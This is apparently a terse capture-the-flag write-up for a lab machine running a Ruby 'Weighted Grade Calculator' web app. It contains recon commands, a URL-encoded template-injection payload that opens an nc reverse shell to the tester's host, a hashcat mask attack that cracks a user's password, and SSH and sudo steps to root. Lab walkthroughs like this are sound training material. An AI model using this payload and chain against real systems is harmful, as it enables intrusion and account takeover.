1. Nmap

sudo nmap -sC -sV --vv -p- -Pn 10.10.11.253 -T5 port 22 port 80

2. Port 80

whatweb 10.10.11.253

http://10.10.11.253 [200 OK] 
Country[RESERVED][ZZ], 
HTTPServer[nginx, WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)], 
IP[10.10.11.253], 
PoweredBy[WEBrick], 
Ruby[3.0.2], 
Script, 
Title[Weighted Grade Calculator], 
UncommonHeaders[x-content-type-options], 
X-Frame-Options[SAMEORIGIN], 
X-XSS-Protection[1; mode=block]

XSS on weighted a%0A<%25%3Dsystem("lrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.65%204444%20%3E%2Ftmp%2Ff");%25>

Category injectable.

3. Revshell

#LinPEAS
/var/mail/susan
group 27(sudo)

On this mail there is a pwd struct firstNameBackwardsfirst(until 1,000,000,000)

hashcat -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d assuming hash is sha256 result: susan_nasus_413759210 ssh susan@10.10.11.253 -> works sudo su